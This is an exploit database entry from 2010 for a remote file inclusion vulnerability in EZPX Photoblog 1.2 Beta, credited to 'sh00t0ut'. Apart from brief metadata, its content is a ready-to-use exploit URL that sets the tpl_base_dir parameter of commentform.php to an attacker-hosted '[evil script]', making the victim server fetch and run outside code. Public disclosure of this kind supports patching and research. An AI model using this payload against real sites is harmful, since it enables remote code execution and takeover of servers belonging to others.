EZPX Photoblog 1.2 Beta - Remote File Inclusion

EDB-ID:

13890


Author:

sh00t0ut

Type:

webapps


Platform:

PHP

Date:

2010-06-16


[~] EZPX photoblog 1.2 beta Remote Include Exploit
[~] Vendor Url: http://ezpx.org/
[~] Found by sh00t0ut
[~] Expl: http://[victim]/system/application/views/public/commentform.php?tpl_base_dir=[evil script]